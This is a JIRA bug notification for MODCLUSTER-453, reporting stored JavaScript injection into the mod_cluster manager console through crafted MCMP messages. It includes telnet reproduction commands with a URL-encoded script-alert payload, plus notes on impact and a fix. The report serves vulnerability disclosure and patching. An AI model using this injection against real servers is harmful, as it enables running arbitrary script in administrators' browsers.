]
Michal Babacek updated MODCLUSTER-453:
--------------------------------------
Security: (was: Security Issue)
It is possible to inject JavaScript into mod_cluster manager console
via MCMP messages
--------------------------------------------------------------------------------------
Key: MODCLUSTER-453
URL:
https://issues.jboss.org/browse/MODCLUSTER-453
Project: mod_cluster
Issue Type: Bug
Components: Native (httpd modules)
Affects Versions: 1.2.6.Final, 1.2.9.Final, 1.2.11.Final, 1.3.1.Beta2
Reporter: Michal Babacek
Assignee: Jean-Frederic Clere
Priority: Critical
Fix For: 1.3.2.Alpha1
Attachments: MODCLUSTER-453_master-better_one.patch,
MODCLUSTER-453_master-mbabacek.patch, MODCLUSTER-453_master-offensive_approach.patch,
patch.new.best.patch, patch.new.txt, patch.txt
This is a nasty one indeed :-)
h3. Steps to reproduce
* start Apache HTTP Server with mod_cluster
* send these messages (provided you test instance listens on 127.0.0.1)
{code}
{ echo "CONFIG / HTTP/1.1"; echo "Host: localhost.localdomain:6666";
echo "Content-Length: 95"; echo "User-Agent: Prdel"; echo
""; echo
"JVMRoute=fake-1&Ho5t=127.0.0.1&Maxattempts=1&Port=8009&StickySessionForce=No&Type=ajp&ping=10";
sleep 1;} | telnet 127.0.0.1 6666
{ echo "ENABLE-APP / HTTP/1.1"; echo "Host:
localhost.localdomain:6666"; echo "Content-Length: 102"; echo
"User-Agent: ClusterListener%2F1.0"; echo ""; echo
'JVMRoute%3Dfake-1%26Alias%3Ddefault-host%26Context%3D%2FX%3Cscript%3Ealert(%27X%27)%3B%3C%2Fscript%3E';
sleep 1;} | telnet 127.0.0.1 6666
{code}
* Open
http://localhost:6666/mod_cluster_manager and enjoy JavaScript pop-up Alert being
executed.
h3. Impact
* Anyone with access to the (hopefully only internal) network from which MCMP messages
are allowed to come from could send these messages and execute arbitrary JavaScript code.
h3. Suggestion
* Leverage {{apr_escape*}} to sanitize MCMP messages.
h3. Proposed patch
* [^patch.new.best.patch]: MCMP messages containing suspicious characters are discarded.